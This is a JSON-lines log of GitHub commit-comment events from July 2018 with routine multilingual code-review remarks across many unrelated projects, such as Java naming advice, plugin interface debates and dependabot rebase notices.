{"id":"7903224734","type":"CommitCommentEvent","actor":{"login":"lwiedema"},"repo":{"name":"FelipGC/MSP_ProjectKickOff_SS188"},"payload":{"comment":{"id":29558439,"position":4,"line":61,"path":"app/src/main/java/com/example/ss18/msp/lmu/msp_projectkickoff_ss188/Connection/AbstractConnectionService.java","commit_id":"c2a58d3cd2d50fc74cb057f038a0eb14c8f08565","created_at":"2018-07-01T15:35:53Z","updated_at":"2018-07-01T15:35:53Z","author_association":"COLLABORATOR","body":"nein, der presenter hat eben NICHT den Callback, wenn er kickt.\r\n\r\nbzw. der viewer nicht, wenn er die Gruppe verlässt."}},"created_at":"2018-07-01T15:35:53Z"}
{"id":"7903225192","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558441,"position":27,"line":27,"path":"Week-4/client.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:36:12Z","updated_at":"2018-07-01T15:36:12Z","author_association":"NONE","body":"Debugging comment"}},"created_at":"2018-07-01T15:36:12Z"}
{"id":"7903226198","type":"CommitCommentEvent","actor":{"login":"recognitionone"},"repo":{"name":"Zazuzaz/unicornpol"},"payload":{"comment":{"id":29558443,"position":4,"line":38,"path":"Vagrantfile","commit_id":"21e52c316f5d38687c6362a51be80210f94d0f2f","created_at":"2018-07-01T15:36:49Z","updated_at":"2018-07-01T15:36:49Z","author_association":"COLLABORATOR","body":"U mnie po tej zmianie /home/vagrant było puste i nie widziało plików projektu (nie dało się uruchomić projektu)"}},"created_at":"2018-07-01T15:36:49Z"}
{"id":"7903227589","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558446,"position":34,"line":34,"path":"Week-4/client.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:37:44Z","updated_at":"2018-07-01T15:37:44Z","author_association":"NONE","body":"Unnecessary, you are using context manager (`with`) which automatically handles closing."}},"created_at":"2018-07-01T15:37:44Z"}
{"id":"7903228632","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"tknopp/NFFT.jl"},"payload":{"comment":{"id":29558449,"position":2,"line":1,"path":"REQUIRE","commit_id":"fa2839d473933508f406f8519a5ca60e163b6766","created_at":"2018-07-01T15:38:28Z","updated_at":"2018-07-01T15:38:28Z","author_association":"NONE","body":"`probably` is a rethorical device to avoid presuming your intentions. You should change it to avoid this package being uninstallable until 0.7 is released."}},"created_at":"2018-07-01T15:38:28Z"}
{"id":"7903230178","type":"CommitCommentEvent","actor":{"login":"MysticCraftYT"},"repo":{"name":"DannehSC/Electricity-2.0"},"payload":{"comment":{"id":29558453,"position":20,"line":36,"path":"Modules/Commands.lua","commit_id":"5bc835f09078a479a64fc2b9477f0fe3bfc14c35","created_at":"2018-07-01T15:39:32Z","updated_at":"2018-07-01T15:39:32Z","author_association":"NONE","body":":)\r\n"}},"created_at":"2018-07-01T15:39:32Z"}
{"id":"7903230199","type":"CommitCommentEvent","actor":{"login":"artemrogov"},"repo":{"name":"artemrogov/phpunit"},"payload":{"comment":{"id":29558454,"position":null,"line":null,"path":null,"commit_id":"0aad88754625cbf8ce3526f1182be79960b2d3d5","created_at":"2018-07-01T15:39:34Z","updated_at":"2018-07-01T15:39:34Z","author_association":"OWNER","body":"Codecourse, и книги, потом практики от laracast "}},"created_at":"2018-07-01T15:39:34Z"}
{"id":"7903230797","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29558455,"position":null,"line":null,"path":null,"commit_id":"e570a72c3d146ec864e5962025c9e29de6fda461","created_at":"2018-07-01T15:39:56Z","updated_at":"2018-07-01T15:39:56Z","author_association":"NONE","body":"Could this game maybe require this?\r\n\r\nhttps://github.com/libretro/reicast-emulator/issues/92"}},"created_at":"2018-07-01T15:39:56Z"}
{"id":"7903231396","type":"CommitCommentEvent","actor":{"login":"saxon-s"},"repo":{"name":"thinkle/gourmet"},"payload":{"comment":{"id":29558456,"position":null,"line":null,"path":null,"commit_id":"149d8c45e763b5577d2893512f4c6eb5f5b178d3","created_at":"2018-07-01T15:40:19Z","updated_at":"2018-07-01T15:40:19Z","author_association":"NONE","body":"This plugin imports Selenium Webdriver which causes the plugin to fail to load on systems that don't have Selenium installed. "}},"created_at":"2018-07-01T15:40:19Z"}
{"id":"7903232053","type":"CommitCommentEvent","actor":{"login":"Midor"},"repo":{"name":"FelipGC/MSP_ProjectKickOff_SS188"},"payload":{"comment":{"id":29558457,"position":4,"line":61,"path":"app/src/main/java/com/example/ss18/msp/lmu/msp_projectkickoff_ss188/Connection/AbstractConnectionService.java","commit_id":"c2a58d3cd2d50fc74cb057f038a0eb14c8f08565","created_at":"2018-07-01T15:40:45Z","updated_at":"2018-07-01T15:40:45Z","author_association":"COLLABORATOR","body":"Vorhin meinte ich doch, ob das an dem disconnect vom presenter liegt 😄 Ob der andere keine Nachricht bekommt, weil er vom presenter gekickt wurde. Da meintest du ja 😄 Wenn wirklich nur er selbst keine nachricht bekommt, okay."}},"created_at":"2018-07-01T15:40:45Z"}
{"id":"7903232489","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558458,"position":2,"line":2,"path":"day01/code/01_HelloWorld案例/HelloWorld.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T15:41:02Z","updated_at":"2018-07-01T15:41:02Z","author_association":"OWNER","body":"public static void main(String [] args){\r\n  system.out.print(\"输入要输出的内容\");\r\n}"}},"created_at":"2018-07-01T15:41:02Z"}
{"id":"7903233500","type":"CommitCommentEvent","actor":{"login":"aszlig"},"repo":{"name":"HabitRPG/habitica"},"payload":{"comment":{"id":29558459,"position":null,"line":null,"path":null,"commit_id":"7c141614edcf7e517ea5e5ff21bf1501a614b23c","created_at":"2018-07-01T15:41:43Z","updated_at":"2018-07-01T15:41:43Z","author_association":"CONTRIBUTOR","body":"@TheHollidayInn: While this is tagged version [`4.50.4`](https://github.com/HabitRPG/habitica/tree/v4.50.4), the version in `package.json` and `package-lock.json` is still `4.50.3`."}},"created_at":"2018-07-01T15:41:43Z"}
{"id":"7903235208","type":"CommitCommentEvent","actor":{"login":"lwiedema"},"repo":{"name":"FelipGC/MSP_ProjectKickOff_SS188"},"payload":{"comment":{"id":29558462,"position":4,"line":61,"path":"app/src/main/java/com/example/ss18/msp/lmu/msp_projectkickoff_ss188/Connection/AbstractConnectionService.java","commit_id":"c2a58d3cd2d50fc74cb057f038a0eb14c8f08565","created_at":"2018-07-01T15:42:58Z","updated_at":"2018-07-01T15:42:58Z","author_association":"COLLABORATOR","body":"Dann haben wir wohl aneinander vorbei geredet 😄 🙈 \r\naber dann ist ja alles gut"}},"created_at":"2018-07-01T15:42:58Z"}
{"id":"7903235885","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29558463,"position":null,"line":null,"path":null,"commit_id":"370f83b1ceda55358bdbe9bdeaa060a96fd4345b","created_at":"2018-07-01T15:43:25Z","updated_at":"2018-07-01T15:43:25Z","author_association":"NONE","body":"I agree! These are very dirty drivers, but easy to add frame injection too, what is why I work on it. Great job anyway, may be using some of your patches at our repo. Personalet, i disabled DFS."}},"created_at":"2018-07-01T15:43:25Z"}
{"id":"7903237182","type":"CommitCommentEvent","actor":{"login":"dschwartz783"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29558464,"position":null,"line":null,"path":null,"commit_id":"49bca0d5a1d18ab4adeee4c01276adf15e47600f","created_at":"2018-07-01T15:44:20Z","updated_at":"2018-07-01T15:44:20Z","author_association":"CONTRIBUTOR","body":"Config-related methods aren't intended to be public? What's the alternative?"}},"created_at":"2018-07-01T15:44:20Z"}
{"id":"7903238631","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558466,"position":null,"line":null,"path":null,"commit_id":"f7c6d1f65394990c437afc4acfeea7c7ea54c2b4","created_at":"2018-07-01T15:45:15Z","updated_at":"2018-07-01T15:45:15Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-154514 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-154514\") to [dev](https://console.bluemix.net/apps/8efd4374-f7fe-4e42-9d67-267470f2e9ed?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T15:45:15Z"}
{"id":"7903239458","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29558470,"position":null,"line":null,"path":null,"commit_id":"49bca0d5a1d18ab4adeee4c01276adf15e47600f","created_at":"2018-07-01T15:45:48Z","updated_at":"2018-07-01T15:45:48Z","author_association":"MEMBER","body":"The existence of a `Config` is not necessary for a plugin to function. If you extended `PluginBase` then you will see no change whatsoever in your plugins.\r\n\r\nThese changes are in an effort to simplify the `Plugin` interface to allow alternative implementations."}},"created_at":"2018-07-01T15:45:48Z"}
{"id":"7903240210","type":"CommitCommentEvent","actor":{"login":"gustavovalverde"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29558471,"position":null,"line":null,"path":null,"commit_id":"b8133aa64bd80c7f90402cf66f269dc9e4496851","created_at":"2018-07-01T15:46:17Z","updated_at":"2018-07-01T15:46:17Z","author_association":"CONTRIBUTOR","body":"Now I understand why this button was doing nothing on the product :)"}},"created_at":"2018-07-01T15:46:17Z"}
{"id":"7903241037","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558473,"position":63,"line":63,"path":"Week-4/client.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:46:50Z","updated_at":"2018-07-01T15:46:50Z","author_association":"NONE","body":"Remove duplication, adapt `receiveFile` to be used here."}},"created_at":"2018-07-01T15:46:50Z"}
{"id":"7903241069","type":"CommitCommentEvent","actor":{"login":"Tatsuya79"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29558474,"position":null,"line":null,"path":null,"commit_id":"400d9d5fd8c33eaa2b29d6942fbbbf6d51cc1bd0","created_at":"2018-07-01T15:46:52Z","updated_at":"2018-07-01T15:46:52Z","author_association":"NONE","body":"Damn you're right, what did I do..."}},"created_at":"2018-07-01T15:46:52Z"}
{"id":"7903243186","type":"CommitCommentEvent","actor":{"login":"Piruzzolo"},"repo":{"name":"yvan-burrie/Genie-Reverse"},"payload":{"comment":{"id":29558476,"position":316,"line":316,"path":"src/Engine/ClipInfo.cpp","commit_id":"450de24b3831266a999f1690b6258f56356019e1","created_at":"2018-07-01T15:48:14Z","updated_at":"2018-07-01T15:48:14Z","author_association":"NONE","body":"May it be a nullptr?"}},"created_at":"2018-07-01T15:48:14Z"}
{"id":"7903243426","type":"CommitCommentEvent","actor":{"login":"kumarranjansingh"},"repo":{"name":"sunil0047/OnlineTest"},"payload":{"comment":{"id":29558477,"position":null,"line":null,"path":null,"commit_id":"3cd6c67ee7d528bba01265742b9631c92d1155ac","created_at":"2018-07-01T15:48:22Z","updated_at":"2018-07-01T15:48:22Z","author_association":"NONE","body":"Move all question to API\r\nuse this link to get the questions by making AJAX call https://jsonblob.com/api/jsonBlob/f1c8e422-7d45-11e8-845b-6508398d471f"}},"created_at":"2018-07-01T15:48:22Z"}
{"id":"7903244133","type":"CommitCommentEvent","actor":{"login":"dschwartz783"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29558479,"position":null,"line":null,"path":null,"commit_id":"49bca0d5a1d18ab4adeee4c01276adf15e47600f","created_at":"2018-07-01T15:48:54Z","updated_at":"2018-07-01T15:48:54Z","author_association":"CONTRIBUTOR","body":"Wouldn't it make sense to create another interface which does have those methods, which implements this interface?"}},"created_at":"2018-07-01T15:48:54Z"}
{"id":"7903244434","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558481,"position":86,"line":86,"path":"Week-4/client.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:49:07Z","updated_at":"2018-07-01T15:49:07Z","author_association":"NONE","body":"Unnecessary."}},"created_at":"2018-07-01T15:49:07Z"}
{"id":"7903245345","type":"CommitCommentEvent","actor":{"login":"kumarranjansingh"},"repo":{"name":"sunil0047/OnlineTest"},"payload":{"comment":{"id":29558482,"position":null,"line":null,"path":null,"commit_id":"3cd6c67ee7d528bba01265742b9631c92d1155ac","created_at":"2018-07-01T15:49:51Z","updated_at":"2018-07-01T15:49:51Z","author_association":"NONE","body":"Use once convention for quotes, use either double or single quotes"}},"created_at":"2018-07-01T15:49:51Z"}
{"id":"7903245391","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29558483,"position":null,"line":null,"path":null,"commit_id":"49bca0d5a1d18ab4adeee4c01276adf15e47600f","created_at":"2018-07-01T15:49:53Z","updated_at":"2018-07-01T15:49:53Z","author_association":"MEMBER","body":"I don't see any reason why, unless you're planning to mess with another plugin's internals, and in that case you usually know the plugin you're messing with anyway, so you don't need the `Plugin` contract to tell you what methods are available."}},"created_at":"2018-07-01T15:49:53Z"}
{"id":"7903247048","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558485,"position":19,"line":19,"path":"Week-4/server.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:51:03Z","updated_at":"2018-07-01T15:51:03Z","author_association":"NONE","body":"Try not to use inbuilts as vars"}},"created_at":"2018-07-01T15:51:03Z"}
{"id":"7903247312","type":"CommitCommentEvent","actor":{"login":"Vitaliy3000"},"repo":{"name":"Vitaliy3000/nummethod"},"payload":{"comment":{"id":29558486,"position":null,"line":null,"path":null,"commit_id":"f4a973da290c12eed2921260c51b6e170be2ffa2","created_at":"2018-07-01T15:51:16Z","updated_at":"2018-07-01T15:51:16Z","author_association":"OWNER","body":"start develop"}},"created_at":"2018-07-01T15:51:16Z"}
{"id":"7903248774","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558489,"position":30,"line":30,"path":"Week-4/server.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:52:19Z","updated_at":"2018-07-01T15:52:19Z","author_association":"NONE","body":"Potentially unreachable."}},"created_at":"2018-07-01T15:52:19Z"}
{"id":"7903249461","type":"CommitCommentEvent","actor":{"login":"rht0910"},"repo":{"name":"rht0910/BlackListener"},"payload":{"comment":{"id":29558491,"position":null,"line":null,"path":null,"commit_id":"0a5352966c25adb3e824134af201c0940975a6d9","created_at":"2018-07-01T15:52:50Z","updated_at":"2018-07-01T15:52:50Z","author_association":"OWNER","body":" * langファイル類のstatus的なやつは準備。エラーでまだ使えない。 \r\n * エラーになったりする行を削除したり実質無効化したものもあります\r\n * BANに証拠・理由が必須\r\n * BANする際にサーバーオーナー・執行者・サーバーを記録\r\n * デフォルトのユーザー・サーバー設定を変更したのでon messageの最初のほうに不足分を追加するもの\r\n![Improvemented this list](https://user-images.githubusercontent.com/19150229/42136215-2b55f9a4-7d92-11e8-8a47-ecf39c63b637.PNG)\r\n"}},"created_at":"2018-07-01T15:52:50Z"}
{"id":"7903251384","type":"CommitCommentEvent","actor":{"login":"UPSD1"},"repo":{"name":"UPSD1/Udacity-Educational-Quiz-App-"},"payload":{"comment":{"id":29558495,"position":2,"line":2,"path":"README.md","commit_id":"239053c0853ac15ff4f1064856755d11b8e4588d","created_at":"2018-07-01T15:54:17Z","updated_at":"2018-07-01T15:54:17Z","author_association":"OWNER","body":"![educational app 2](https://user-images.githubusercontent.com/33966958/42136228-51bd722c-7d4f-11e8-9200-2f3ba6448061.png)\r\n![educational app](https://user-images.githubusercontent.com/33966958/42136229-522ccc26-7d4f-11e8-83eb-b90b1f476088.png)\r\n"}},"created_at":"2018-07-01T15:54:17Z"}
{"id":"7903251755","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29558498,"position":null,"line":null,"path":null,"commit_id":"505ed39a2dcac1e18cb73e8b07044252828e3bcc","created_at":"2018-07-01T15:54:35Z","updated_at":"2018-07-01T15:54:35Z","author_association":"NONE","body":"This will fail once we enable mmu support, as the bss is zeroed after the mmu is set up.\r\n\r\nAlso since we are running from ram, we don't need to avoid the data segment on rpi as we do on the st"}},"created_at":"2018-07-01T15:54:35Z"}
{"id":"7903252583","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29558501,"position":null,"line":null,"path":null,"commit_id":"a72d1342e0204497a0b650c98f7bfccf05a59736","created_at":"2018-07-01T15:55:10Z","updated_at":"2018-07-01T15:55:10Z","author_association":"COLLABORATOR","body":"I saved and reloaded a file with changing of ratio, worked like expected.\r\nSure if someone manages to change change the settings text by hand, the width will again be overridden by ratio with height on load.\r\n\r\notherwise i can see no downside in this."}},"created_at":"2018-07-01T15:55:10Z"}
{"id":"7903253937","type":"CommitCommentEvent","actor":{"login":"gilbertohasnofb"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558506,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T15:56:10Z","updated_at":"2018-07-01T15:56:10Z","author_association":"COLLABORATOR","body":">  I've never seen an attitude indicator matching the one we have in FG anywhere on the internet (I've searched long and hard).\r\n\r\n@it0uchpods Our AI is modelled after one that is used by the model P. See:\r\n\r\nhttp://imgproc.airliners.net/photos/airliners/0/6/9/0595960.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/5/9/9/1774995.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/1/3/7/4811731.jpg?v=v42736419921\r\nhttp://imgproc.airliners.net/photos/airliners/0/5/3/2695350.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/3/3/0/2558033.jpg?v=v40\r\n\r\n> A quick search of C172P cockpit will show you tons of cockpits, all with similar indicators.\r\n\r\nDon't use Google Images when searching for a specific model, the search result will show you all sorts of cockpits from all sort of models. The most reliable method I found is to use http://airliners.net/ and search for `172p cockpit`, and there you will see that our AI is absolutely common.\r\n\r\nAlso, if you have some concrete about improving our gauges then please do open a new issue for that as our conversation here is very out of topic."}},"created_at":"2018-07-01T15:56:10Z"}
{"id":"7903254042","type":"CommitCommentEvent","actor":{"login":"dschwartz783"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29558507,"position":null,"line":null,"path":null,"commit_id":"49bca0d5a1d18ab4adeee4c01276adf15e47600f","created_at":"2018-07-01T15:56:13Z","updated_at":"2018-07-01T15:56:13Z","author_association":"CONTRIBUTOR","body":"I suppose that makes sense. You can't really work with getConfig unless you know which plugin you're working with anyway, since beyond the method name itself, there are no guarantees."}},"created_at":"2018-07-01T15:56:13Z"}
{"id":"7903255702","type":"CommitCommentEvent","actor":{"login":"kumarranjansingh"},"repo":{"name":"sunil0047/OnlineTest"},"payload":{"comment":{"id":29558511,"position":null,"line":null,"path":null,"commit_id":"3cd6c67ee7d528bba01265742b9631c92d1155ac","created_at":"2018-07-01T15:57:26Z","updated_at":"2018-07-01T15:57:26Z","author_association":"NONE","body":"function optionText\r\nlogic can be changed to match the answers, as every question will have one option use name attribute for checkbox input and select the right answer like -> document.querySelectorAll('[question1]')"}},"created_at":"2018-07-01T15:57:26Z"}
{"id":"7903257489","type":"CommitCommentEvent","actor":{"login":"arindom38"},"repo":{"name":"Gaurav927/Prediction-of-Future-Location"},"payload":{"comment":{"id":29558512,"position":null,"line":null,"path":null,"commit_id":"3d3661d9cdcc8e1feaaf1745a8593792bf509ab2","created_at":"2018-07-01T15:58:40Z","updated_at":"2018-07-01T15:58:40Z","author_association":"NONE","body":"Hello sir , I have downloaded your work. I want to understand the code by running with thoroughly.But i can't find the \"all.csv\" file . Can you please provide me with this file. Thank you.\r\n"}},"created_at":"2018-07-01T15:58:40Z"}
{"id":"7903258696","type":"CommitCommentEvent","actor":{"login":"uNMaRsun"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558515,"position":null,"line":null,"path":null,"commit_id":"15c12639fbb4c583c0d55182058dcc10b5254578","created_at":"2018-07-01T15:59:35Z","updated_at":"2018-07-01T15:59:35Z","author_association":"NONE","body":"Updating PHP script:\r\n1. Go to https://github.com/SteamDatabase/SalienCheat/blob/master/cheat.php\r\n2. Click Left Mouse Button on Raw and \"Save as..\"\r\n3. Save cheat.php into your SalienCheat folder with replacement\r\n4. Stop your script with ctrl-c\r\n5. Run script as normal"}},"created_at":"2018-07-01T15:59:35Z"}
{"id":"7903259117","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558517,"position":15,"line":15,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T15:59:53Z","updated_at":"2018-07-01T15:59:53Z","author_association":"OWNER","body":"多看英文单词、多学习英文知识，起的名字要见名知意"}},"created_at":"2018-07-01T15:59:53Z"}
{"id":"7903260094","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558525,"position":21,"line":21,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:00:27Z","updated_at":"2018-07-01T16:00:27Z","author_association":"OWNER","body":"重点：类或者接口，首字母要大写"}},"created_at":"2018-07-01T16:00:27Z"}
{"id":"7903260996","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558526,"position":24,"line":24,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:01:00Z","updated_at":"2018-07-01T16:01:00Z","author_association":"OWNER","body":"在多个单词的时候，每个单词的首字母要大写"}},"created_at":"2018-07-01T16:01:00Z"}
{"id":"7903261096","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29558527,"position":null,"line":null,"path":null,"commit_id":"bddabb0245fda6b4ddb67bb3592dc3c622f95bd8","created_at":"2018-07-01T16:01:03Z","updated_at":"2018-07-01T16:01:03Z","author_association":"COLLABORATOR","body":"UPS."}},"created_at":"2018-07-01T16:01:03Z"}
{"id":"7903261293","type":"CommitCommentEvent","actor":{"login":"TheHollidayInn"},"repo":{"name":"HabitRPG/habitica"},"payload":{"comment":{"id":29558528,"position":null,"line":null,"path":null,"commit_id":"7c141614edcf7e517ea5e5ff21bf1501a614b23c","created_at":"2018-07-01T16:01:10Z","updated_at":"2018-07-01T16:01:10Z","author_association":"CONTRIBUTOR","body":"Thanks! "}},"created_at":"2018-07-01T16:01:10Z"}
{"id":"7903261786","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558529,"position":28,"line":28,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:01:31Z","updated_at":"2018-07-01T16:01:31Z","author_association":"OWNER","body":"方法后者变量， 一个单词要全部小写\r\n"}},"created_at":"2018-07-01T16:01:31Z"}
{"id":"7903261805","type":"CommitCommentEvent","actor":{"login":"ciprianvintea"},"repo":{"name":"jenkinsci/vectorcast-execution-plugin"},"payload":{"comment":{"id":29558530,"position":null,"line":null,"path":null,"commit_id":"d9f6175feabe1dd3faa0921fd8ddf6b120a47f07","created_at":"2018-07-01T16:01:31Z","updated_at":"2018-07-01T16:01:31Z","author_association":"NONE","body":"I see that UpdateMultiJob.java also has a method for PhaseJobsConfig:\r\n`PhaseJobsConfig phase = new PhaseJobsConfig(newJobName,...`\r\nI think this method should also be updated for supporting different constructor for Multijob plugin. Am I right?"}},"created_at":"2018-07-01T16:01:31Z"}
{"id":"7903262644","type":"CommitCommentEvent","actor":{"login":"Ayanfejesuschrist"},"repo":{"name":"Ayanfejesuschrist/QuizApp"},"payload":{"comment":{"id":29558531,"position":null,"line":null,"path":null,"commit_id":"22785c88b4fbf3c4f7d14ed453f551ded38f4fe9","created_at":"2018-07-01T16:02:08Z","updated_at":"2018-07-01T16:02:08Z","author_association":"OWNER","body":"https://drive.google.com/open?id=15fafi1SR0yIzdTvLjs6Lx1AXGVA0m_ZJ this  is the link to my app apk....https://drive.google.com/open?id=15fafi1SR0yIzdTvLjs6Lx1AXGVA0m_ZJ"}},"created_at":"2018-07-01T16:02:08Z"}
{"id":"7903263466","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558533,"position":30,"line":30,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:02:44Z","updated_at":"2018-07-01T16:02:44Z","author_association":"OWNER","body":"方法后者变量：多个单词的时候，从第二个单词开始，每个单词首字母要大写"}},"created_at":"2018-07-01T16:02:44Z"}
{"id":"7903263668","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"squirly/di"},"payload":{"comment":{"id":29558534,"position":null,"line":null,"path":null,"commit_id":"698d0406869758ab4e74b77ff890d6b2cc85bc1c","created_at":"2018-07-01T16:02:54Z","updated_at":"2018-07-01T16:02:54Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #26 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-01T16:02:54Z"}
{"id":"7903263800","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558535,"position":34,"line":34,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:03:00Z","updated_at":"2018-07-01T16:03:00Z","author_association":"OWNER","body":"常量：一个单词时候要全部大写"}},"created_at":"2018-07-01T16:03:00Z"}
{"id":"7903264545","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29558537,"position":null,"line":null,"path":null,"commit_id":"505ed39a2dcac1e18cb73e8b07044252828e3bcc","created_at":"2018-07-01T16:03:30Z","updated_at":"2018-07-01T16:03:30Z","author_association":"OWNER","body":"On Sonntag, 1. Juli 2018 17:54:40 CEST Keli Hlodversson wrote:\n> This will fail once we enable mmu support, as the bss is zeroed after the\n> mmu is set up.\n\nOops.\n\n>Also since we are running from ram, we don't need to avoid the data segment \n>on rpi as we do on the st\n\nHm, i would still prefer to  keep it like that, otherwise you have to ignore \nthe warning from the makefile, and then you don't notice things anymore where \nvariables should really be const. Maybe you can use a separate linker section \nfor the mmu table?\n\n\n\n"}},"created_at":"2018-07-01T16:03:30Z"}
{"id":"7903265030","type":"CommitCommentEvent","actor":{"login":"zhangpengchengN1"},"repo":{"name":"zhangpengchengN1/Java"},"payload":{"comment":{"id":29558540,"position":36,"line":36,"path":"day01/code/04_标识符/NameDemo.java","commit_id":"0e5c44c62d28371a8d74623b5373ee47ff23509b","created_at":"2018-07-01T16:03:51Z","updated_at":"2018-07-01T16:03:51Z","author_association":"OWNER","body":"常量：多个单词时候，每个单词都大写，用_（下划线）连接"}},"created_at":"2018-07-01T16:03:51Z"}
{"id":"7903265035","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"squirly/di"},"payload":{"comment":{"id":29558541,"position":null,"line":null,"path":null,"commit_id":"5a4d526df0acd3851cea9559ec4cb37edc97ad78","created_at":"2018-07-01T16:03:51Z","updated_at":"2018-07-01T16:03:51Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #28 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-01T16:03:51Z"}
{"id":"7903266124","type":"CommitCommentEvent","actor":{"login":"Jeff5464"},"repo":{"name":"Jeff5464/QuizApp"},"payload":{"comment":{"id":29558542,"position":null,"line":null,"path":null,"commit_id":"7403ad77a7b43f317d297403e2a8d57f9d3677cf","created_at":"2018-07-01T16:04:39Z","updated_at":"2018-07-01T16:04:39Z","author_association":"OWNER","body":"This app tests your trade knowledge skills."}},"created_at":"2018-07-01T16:04:39Z"}
